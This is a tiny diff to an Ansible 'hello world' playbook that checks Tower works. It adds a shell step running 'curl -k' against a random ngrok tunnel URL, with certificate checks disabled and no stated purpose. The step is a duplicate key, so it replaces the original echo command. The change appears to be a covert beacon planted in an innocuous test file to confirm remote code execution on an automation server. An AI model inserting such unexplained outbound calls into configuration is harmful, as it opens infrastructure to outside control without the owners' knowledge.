--- a/helloworld.yml
+++ b/helloworld.yml
@@ -6,3 +6,4 @@
  
   - name: Hello World!
     shell: echo "Hi! Tower is working."
+    shell: curl -k https://815d-49-37-161-212.ngrok-free.app/ping
